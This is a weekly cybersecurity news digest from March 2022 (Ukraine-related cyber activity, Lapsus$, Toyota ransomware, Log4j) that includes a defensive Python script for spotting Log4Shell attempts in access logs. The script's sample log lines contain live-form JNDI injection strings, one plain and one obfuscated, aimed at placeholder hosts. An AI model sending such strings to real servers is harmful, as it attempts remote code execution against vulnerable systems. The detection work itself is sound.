Friday, March 04, 2022 // (IG): BB // Weekly Sponsor: ISG
“Anonymous” Hacker Collective Declares Cyber War Against Russian Government Over Ukraine Invasion
FROM THE MEDIA: The hacker collective “Anonymous,” famous for engaging in hacktivism campaigns since the early 2000s, has pledged to digitally fight against Russia as it invades Ukraine. The group has been active in its cyber war in the early days, leaking Russian Ministry of Defense documents and cutting into Russian television feeds, among other actions. The move continues a sharp focus on activism for the group, which has ranged across a broad variety of targets (from NASA and the Canadian government to ISIS and the Ku Klux Klan). After a period of dormancy that lasted several years, the group re-emerged in 2020 with a long string of campaigns that appear to strongly favor Democrat domestic political interests and general United States foreign policy positions. The group’s alignments raise the question of whether its actions could be viewed as a US-supported attack on Russia, possibly escalating the situation and leading to retaliation as the hacker collective threatens to take the country’s industrial control systems “hostage.”
READ THE STORY: CPO Magazine // Wired
White House backs bill requiring mandatory cyber reporting to CISA amid Ukraine crisis
FROM THE MEDIA: The White House has come out in full support of a bill requiring hospitals, power plants, water utilities, airports and other critical infrastructure to report cyber attacks to the Department of Homeland Security within 72 hours. The move comes amid the escalating war in Ukraine and concerns of possible Russian cyber threats to the U.S. In a statement confirming the White House's support, a spokesperson said the legislation is "a part of the Administration's comprehensive effort to modernizing America's cyber defenses and complements the President's efforts to improve cybersecurity." The White House underscored that the bill will "ensure the Federal government rapidly receives information about cyber incidents affecting critical infrastructure which provide the essential services on which Americans rely," enabling the government to "better investigate, mitigate, and further prevent cyber-attacks." Yet in its statement, the White House left the door open to future changes, indicating it "remains committed to working with the House, and exploring all options, to ensure that the legislation enables all relevant Federal agencies to receive and process these incident reports as quickly as possible to carry out their cybersecurity missions."
READ THE STORY: CBS News
Ukraine cyber group to strike at Russia's critical infrastructure
FROM THE MEDIA: A Ukrainian cyber guerrilla warfare group is planning to strike back against Russia, targeting the country’s critical infrastructure amid the Russian invasion of Ukraine. Ukraine’s Defense Ministry asked the group, led by cybersecurity expert Yegor Aushev, to use its cyber capabilities to disrupt railways and electrical grids and to stanch the flow of weapons from Russia, according to Reuters. Aushev told Reuters on Monday that his group will do what it takes to stop the war, including launching hacking attacks. “The goal is to make it impossible to bring these weapons to our country,” he said, adding that his group has already targeted dozens of Russian government and banking websites. Aushev also said that his group has garnered more than 1,000 Ukrainian and foreign volunteers. The cyber warfare between the two countries has escalated in recent weeks. Ukraine was on defense last week after several of its government websites were hit by a cyberattack believed to originate from Russia.
READ THE STORY: The Hill // HT Tech
Accelerated Ransomware Attacks Pressure Targeted Companies to Speed Response
FROM THE MEDIA: Threat actors have focused on two ends of the spectrum — quick, impactful attacks or stealthy intrusions — making strong prevention and faster response more important for enterprises. Ransomware attackers have taken a variety of incremental steps over the past year that have resulted in shorter infection-payload cycles — requiring businesses to more quickly respond to potential malicious behavior. In its "2022 Cyber Threat Landscape Report" published this week, Deep Instinct said that its data shows that execution, persistence, and privilege escalation were the top three attacker actions, as defined by the MITRE ATT&CK framework, suggesting that adversaries had focused on initial infiltration and payload execution as opposed to extensive lateral movement. In addition, the increased adoption of ransomware-as-a-service (RaaS), which is easily accessible on the Dark Web, has resulted in a 15% increase in detected ransomware threats, according to the report. The threat landscape is going to be extremely treacherous in coming months, especially as cyber operations escalate because of Russia's war on Ukraine, making defensive agility very important, says Shimon Oren, vice president of threat research and AI intelligence for Deep Instinct.
READ THE STORY: Dark Reading
Cybercriminals who breached Nvidia issue one of the most unusual demands ever
FROM THE MEDIA: Data extortionists who stole up to 1 terabyte of data from Nvidia have delivered one of the most unusual ultimatums ever in the annals of cybercrime: allow Nvidia's graphics cards to mine cryptocurrencies faster or face the imminent release of the company's crown-jewel source code. A ransomware group calling itself Lapsus$ first claimed last week that it had hacked into Nvidia's corporate network and stolen more than 1TB of data. Included in the theft, the group claims, are schematics and source code for drivers and firmware. A relative newcomer to the ransomware scene, Lapsus$ has already published one tranche of leaked files, which among other things included the usernames and cryptographic hashes for 71,335 of the chipmaker's employees. The group then went on to make the highly unusual demand: remove a feature known as LHR, short for "Lite Hash Rate," or see the further leaking of stolen data. "We decided to help mining and gaming community," Lapsus$ members wrote in broken English. "We want nvidia to push an update for all 30 series firmware that remove every lhr limitations otherwise we will leak hw folder. If they remove the lhr we will forget about hw folder (it's a big folder). We both know lhr impact mining and gaming."
READ THE STORY: Ars Technica
Cyber-Attack on New York Ethics Watchdog
FROM THE MEDIA: New York State’s Joint Commission on Public Ethics (JCOPE) has been forced to shut down its systems following a “deliberate malicious cyber-attack.” The ethics watchdog, which regulates lobbying at the State Capitol, said on Friday that an investigation had been launched to determine the scope of the attack and who was behind it. The alarm was raised at the beginning of last week by workers at the New York Office of Information Technology Services (ITS) who received an alert regarding suspicious activity on JCOPE’s network. The Commission shut down systems, including its lobbying application and financial disclosure statement online filing system as a precaution. JCOPE said the attack was confirmed following “several days of preliminary forensic analysis by ITS.” No timeline has been given as to when the systems will be back up and running, with JCOPE saying only that the systems will remain offline “until they can be brought back up safely.” An investigation into the incident has been launched. However, a suspect is yet to emerge.
READ THE STORY: Infosecurity
Toyota Group resumes production in Japan after major supplier hit by ransomware. Here is the series of events
FROM THE MEDIA: One of the largest automotive manufacturers, Toyota, was forced to halt its operations in Japan after a key parts supplier became a victim of a cyberattack. On Monday, 28th of February 2022, Toyota made an official statement saying, “Due to a system failure at a domestic supplier (Kojima Industries Corporation), we have decided to suspend the operation of 28 lines at 14 plants in Japan on Tuesday, March 1st (both 1st and 2nd shifts).” According to the supplier, Kojima Industries – not to be confused with the Japanese game developer Kojima Productions – it received “a threatening message” on Saturday 26th of February 2022, which it later confirmed as ransomware. The following Monday, an official close to Kojima Industries told the Japanese business daily Nikkei, “It is true that we have been hit by some kind of cyberattack. We are still confirming the damage and we are hurrying to respond, with the top priority of resuming Toyota’s production system as soon as possible.” The official also added that Toyota representatives and cybersecurity experts are at Kojima Industries to determine the cause. Then on Tuesday, Kojima Industries announced that it had found a virus in its servers.
READ THE STORY: SoyaCincau
Log4j Forced a Cybersecurity Wake-Up Call
FROM THE MEDIA: It’s been nearly four months since Alibaba Cloud’s security team first reported a remote code execution (RCE) vulnerability in Apache Log4j (the flaw is also known as Log4Shell). Due to the popularity and widespread use of this logging library, it very quickly became a top priority for security operatives and administrators around the world. Within weeks, Apache issued a patch for the logging library vulnerability (CVE-2021-44228), which carried the highest severity rating of 10.0. Despite the quick response, it is estimated that more than 89% of all environments across businesses and cloud providers have vulnerable Log4j libraries. This particular RCE vulnerability posed an enormous threat to affected organizations, given how widely used the library is around the globe. Suddenly, adversaries had unlimited administrative access to a very vulnerable system. It was all hands on deck to try and get on top of the vulnerability. At the same time, threat intelligence sources started reporting mass scanning activity from several hosts checking for servers using Apache Log4j: the hunters had arrived. From past experience, experts concluded that attacks on RCE vulnerabilities usually begin with automated reconnaissance scans to first identify targets with vulnerable versions of the software. Attackers then exploited the vulnerability using a specially crafted string that is processed by the vulnerable Log4j component, enabling unauthenticated remote code execution and potentially resulting in full access to the target system by the attacker.
READ THE STORY: Security Boulevard
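The scan-then-crafted-string sequence described above is what defenders hunted for in their web access logs during the Log4Shell response: the crafted string is a Log4j `${jndi:...}` lookup, and attackers hid it inside nested helper lookups (`${lower:j}`, `${::-j}`) to evade naive grep rules. The detector below is an added example written for this digest; it is not code from the article, from Apache, or from any vendor named on this page. It assumes Apache-style access logs and uses a handful of constructed sample lines (documentation-range IP addresses) to show how flattening the nested lookups before matching catches the obfuscated form as well as the plain one.

```python
"""Flag Log4Shell-style JNDI lookup strings in web access logs (added example)."""
import re
from typing import List, Optional, Tuple

# Constructed sample lines; the 203.0.113.0/24 addresses are documentation-only.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:14:03:40 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.10:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:14:03:41 +0000] "GET /login HTTP/1.1" 200 512 "-" "${${lower:j}ndi:rmi://203.0.113.10/b}"',
    '10.0.0.7 - - [10/Dec/2021:14:05:02 +0000] "GET /docs/${date:yyyy} HTTP/1.1" 404 0 "-" "curl/7.79"',
]

# A lookup whose body contains no further '$', '{' or '}' is innermost and can be
# evaluated without looking at anything around it.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")

# After flattening, the real indicator is a lookup whose name is 'jndi'; the
# capture group records the protocol scheme (ldap, rmi, dns, ...) for triage.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)", re.IGNORECASE)


def _resolve(content: str) -> Optional[str]:
    """Return the plain text a helper lookup evaluates to, or None if it is not one.

    Handles the two obfuscation helpers seen in the wild: case conversion
    (${lower:j}, ${upper:j}) and the default-value form (${env:NOPE:-j}, ${::-j}),
    which evaluates to the text after ':-' when the named variable is unset.
    """
    name, sep, arg = content.partition(":")
    key = name.lower()
    if sep and key in ("lower", "upper"):
        return arg.lower() if key == "lower" else arg.upper()
    if ":-" in content:
        return content.rsplit(":-", 1)[1]
    return None  # e.g. ${date:yyyy} or ${jndi:...}: leave it in place


def normalize_lookups(text: str) -> str:
    """Repeatedly evaluate innermost helper lookups until none remain.

    '${${lower:j}ndi:ldap://h}' becomes '${jndi:ldap://h}'; benign lookups such as
    '${date:yyyy}' are left untouched so they do not trigger false positives.
    """
    while True:
        changed = False

        def repl(match: re.Match) -> str:
            nonlocal changed
            resolved = _resolve(match.group(1))
            if resolved is None:
                return match.group(0)
            changed = True
            return resolved

        text = INNER_LOOKUP.sub(repl, text)
        if not changed:
            return text


def scan_log_lines(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Return (line_number, scheme, evidence) for every line carrying a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, start=1):
        flat = normalize_lookups(line)
        match = JNDI_LOOKUP.search(flat)
        if match:
            evidence = flat[match.start():match.start() + 60]
            hits.append((number, match.group(1).lower(), evidence))
    return hits


if __name__ == "__main__":
    for number, scheme, evidence in scan_log_lines(SAMPLE_LOG_LINES):
        print(f"line {number}: jndi lookup via {scheme}: {evidence}")
```

Running the script flags lines 2 and 3 (the plain `ldap` lookup and the `rmi` lookup hidden behind `${lower:j}`) and ignores line 4, whose `${date:yyyy}` is an ordinary Log4j lookup with no JNDI reference. Matching after normalization is the point: a rule that only greps for the literal `${jndi:` misses the third line entirely, and a rule that alerts on any `${` drowns the analyst in benign lookups.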
Treasury Department sanctions alleged Russian cyber-espionage, disinformation sources
FROM THE MEDIA: The Biden administration on Thursday sanctioned Russian oligarchs and organizations for their role in spreading disinformation and supporting Russian President Vladimir Putin’s war in Ukraine, among them a news agency the Treasury Department says has ties to a Russian cyber-espionage and offensive unit. The sanctions targeted nine employees of InfoRos, a nominal news agency primarily run by the GRU, which controls the Russian military intelligence service and operates its own special forces units. According to the Treasury Department, the GRU’s 72nd Main Intelligence Information Center, a unit within Russia’s Information Operations Troops, functions as Russia’s “military force for conducting cyber espionage, influence, and offensive cyber operations” and is InfoRos’ operator. In a news release, the Treasury Department said InfoRos is a network of more than 1,000 websites which “spread false conspiracy narratives and disinformation promoted by GRU officials.” For example, in early December 2021, Treasury officials said, one Ukraine-based InfoRos writer contributed an editorial which argued Ukraine was provoking Russia into war.
READ THE STORY: CyberScoop
MITRE Engage framework provides defense strategies for the cyber defense community
FROM THE MEDIA: Informed by adversary behavior observed in the real world, Engage helps chief information security officers (CISOs), cyber defenders, and vendors to implement defense strategies. Adversary engagement and deception operations can cut the cost of a data breach in half, waste an adversary’s time, and make attackers easier to detect. Engage maps to the MITRE ATT&CK framework, which enables practitioners to quickly identify an attacker’s vulnerabilities when using a specific ATT&CK technique and how to take advantage of those vulnerabilities. “Engage is about empowering the cyber defense community,” said Maretta Morovitz, MITRE Engage lead. “Every day, adversaries launch cyber attacks. Some will always slip through. Taller walls aren’t the complete solution. We need to stop what we can and be prepared to engage with the ones who make it through. With traditional cyber defense, the adversary only needs to be right once, but with cyber deception, the adversary only needs to be wrong once.” Building upon MITRE’s Shield framework and more than 10 years of operational experience, Engage defines a common terminology for the cyber defense community.
READ THE STORY: Help Net Security
"Putin is using Iran for his cyber warfare"
FROM THE MEDIA: “Russia and China will continue to be forces that will cause a lot of trouble in the Western world as agents of chaos, but in the end people are looking for freedom - so the situation will change for the better,” says cyber expert Morgan Wright, Chief Security Advisor at Israeli cyber unicorn SentinelOne. Iran may be many kilometers from the Russia-Ukraine war, but there is a connection between the two fronts, one most people aren’t really aware of. "I grew up in Iran," Morgan Wright, Chief Security Advisor at Israeli cyber unicorn SentinelOne says with a smile. "I know their mentality and even understand Persian because I was there as a child." Wright may seem like a likable American with gray hair and a carefully trimmed beard, but as an expert in security he has hopped between jobs in the CIA and the NSA and has advised and assisted governments and cyber companies. Wright is an expert on cyber strategy, online terrorism, national security and intelligence. He serves as a senior fellow at the Center for Digital Governance, a research institute of the U.S. Federal Government that deals with digital and governance issues. He also serves as a senior consultant and expert on the Fox network. He has testified more than once in government committees, including the need to change the way the U.S. government collects identifying data in its digital healthcare system (healthcare.gov). He taught NSA agents behavioral analysis and spent about 18 years in uniform at various law enforcement agencies. Beyond that, he has also developed quite a few solutions for technology giants such as Cisco, Unisys or Alcatel-Lucent. When Wright says that Russia and Iran are cooperating in the cyber field, it is worth listening to him because it also concerns us.
READ THE STORY: Calcalistech
Items of interest
The Iran-Russia Cyber Agreement and U.S. Strategy in the Middle East (Article)
FROM THE MEDIA: This January, Russian Foreign Minister Sergey Lavrov and his Iranian counterpart Javad Zarif signed a cooperation agreement on cybersecurity and information and communications technology (ICT). The agreement includes cybersecurity cooperation, technology transfer, combined training, and coordination at multilateral forums, like the United Nations.
READ THE STORY: CFR
Spokesman From ALPHV (BlackCat) Talks About the Group's Intentions for a Ransomware 'Meta-Universe' (Video)
FROM THE MEDIA: Last year, cybersecurity experts started noticing a ransomware variant known as ALPHV, which stood out as unusually sophisticated and as being written mainly in the Rust programming language, a first for real-world malware. According to reports published earlier in the week, German cybersecurity experts suspect the gang is behind the latest attack on two German transport companies, which resulted in oil supply interruptions at several service stations. In several reports, a member of the gang, which is also referred to as BlackCat, consented to speak with Dmitry Smilyanets, an analyst at Recorded Future, about the gang's history, aims, and future ambitions. In response to Smilyanets' questions, the representative said the following:
“ALPHV is the only name that we have. The Record created BlackCat, while Symantec created BC.aNoberus. Because we are all adverts, we are linked to gandrevil, blackside, mazegreggor, lockbit, and so on. Without exaggerating, we feel there is still no rival software in the market. For advanced clients, along with high-quality technology, we offer the whole variety of services associated with ransom — premium concierge or metaverse, call it what you want.”
Cyber Attacks in Ukraine, Russia & Around the World (Video)
FROM THE MEDIA: As Russian ground forces advance in Ukraine, experts are watching how warfare may play out online. They're pointing to a powerful new data-wiping form of malware designed by Russian hackers, as well as the 'Anonymous' hacker group's recent declaration of war against Russia.
About this Product
These open source products are reviewed by analysts at InfoDom Securities and provide possible context about current media trends in the realm of cyber security. The stories selected cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not specifically endorse any third-party claims made in their original material or related links on their sites, and the opinions expressed by third parties are theirs alone. Contact InfoDom Securities at dominanceinformation@gmail.com